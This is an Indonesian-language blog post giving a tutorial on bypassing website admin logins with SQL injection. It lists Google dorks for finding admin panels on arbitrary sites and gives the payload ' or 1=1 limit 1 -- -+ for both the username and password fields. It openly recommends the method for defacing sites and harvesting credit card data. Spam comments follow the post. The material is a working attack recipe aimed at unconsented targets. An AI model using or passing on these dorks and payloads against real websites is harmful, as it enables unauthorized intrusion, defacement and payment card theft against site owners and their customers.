Oke, kali ini saya mau share tutorial SQLi Bypass Login :D . Dengan teknik ini, kita bisa login ke halaman admin suatu website tanpa perlu memasukkan user dan password yang dibuat oleh admin. Udah lama sih tutorial ini saya dapat :D . Baru sempet share aja . hehehe. Oke langsung saja ke tutorialnya :) .
Google Dork :
inurl:manager intitle:Admin Panel
inurl:/admin2/ ext:php
inurk:/admin/ ext:php
inurl:/adminpanel/ ext:php
inurl:/admin_panel/
Kembangin lagi dorknya ya :)
Langkah langkah :
Nah, kalo udah dapet salahsatu web nya, kita login dengan user dan password berikut :
user : ' or 1=1 limit 1 -- -+
pass : ' or 1=1 limit 1 -- -+
Jika vuln, pasti masuk halaman admin kok :)
Gampang sekali bukan ?
Cara ini sebenarnya banyak manfaatnya. Selain buat yang hobi deface sana sini, yang mau cari credit card pakai cara ini juga terbukti ampuh :D
Tapi inget, dosa tanggung sendiri. ;)
Sekian tutorial kali ini . Terimakasih :)
2 komentar:
Pusat Baju Bola
Pusat penjualan Baju Bola, kaos bola, jaket bola, syal bola
Pusat Penjualan Baju bola, Kaos Bola, Jaket Bola, Syal Bola
sports
http://www.pusatbajubola.com
Berita Bola Terupdate
Klik DI SINI
Posting Komentar